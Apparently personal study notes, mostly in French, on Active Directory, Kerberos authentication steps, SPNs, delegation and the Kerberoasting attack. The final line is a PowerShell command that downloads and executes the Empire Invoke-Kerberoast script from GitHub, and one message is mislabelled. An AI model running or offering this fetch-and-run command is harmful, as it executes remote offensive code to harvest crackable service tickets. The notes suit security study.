# Active Directory
## Basics
systeme d'annuaire LDAP  
systeme d'auth Kerberos  
systeme de resolution de nom DNS  
politique logicielle homogène
## SPN (Service Principal Name)
Un SPN est définit par une machine et un service (car possibilité d'avoir plusieurs services sur une même machine). Ex: classe_du_service/hostname_ou_FQDN((:port)/nom_arbitraire)
## Kerberos
Client, Server, Key Distribution Center (KDC)  
In AD, the KDC is likely the Domain Controler (DC) so he has more informations   
  
3 steps auth : Authentication Service (AS) (C to KDC), Ticket-Granting Ticket (TGT), Acces au service (AP)

### AS
Demande de TGT au KDC --> KRB_AS_REQ  
:: nom + timestamp chiffré avec son secret ::  
  
Le KDC vérifie le chiffrement avec sa BDD  
S'il correspond, il envoie au C une clef de session  
### TGT
Envoie de clef de session --> KRB_AS_REP  
:: clef de session chiffré avec le secret de C ::
:: TGT : nom C, periode validité, clef session, Privilege Attribute Certificate (PAC) (droits, groupes, infos ...), le tout chiffré avec la clef du KDC ::  
Le client a donc maintenant une clef session et un TGT chiffré qu'il ne connait pas  
  
Si C veut accéder à un service, il doit envoyer au KDC --> KRB_AS_REQ  
:: Le TGT, l'ID du service, authenticator (nom et timestamp) chiffré avec la clef de session ::  
Le KDC va pouvoir verifier les infos de chaque param  
  
Le KDC envoie les infos à C pour accéder au server --> KRB_TGS_REP  
:: nom du service, nom C , timestamp, PAC, nouvelle clef session pour C et S, le tout chiffré avec la clef du service ! :: + nouvelle clef session :: le tout chiffré avec la première clef de session C et KDC  
Le paquet indéchiffrable pour le client est le TGS (Ticket Granting Service)  
### AP  
C demande au server d'utiliser son service --> KRB_AP_REQ  
:: le TGS, un nouveau authenticator chiffré avec la nouvelle clef session ::  
Le service peut accepter ou refuser.  
  
Un flag supplémentaire peut être ajouté lorsque le service en question utilise lui aussi un autre service, qui lui peut/doit être restrictif vis-à-vis du client.  
Constrained Delegation et Unconstrained Delegation.

## Attacks
### Kerberoasting
Demande de TGS en listant les tous les services possibles et en bruteforçant le déchiffrement du ticket. Plus efficace contre les services utilisant des mots de passe faible.
# Ressources
https://beta.hackndo.com/kerberoasting/  
https://beta.hackndo.com/service-principal-name-spn/  
https://beta.hackndo.com/kerberos/  

iex​(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1')
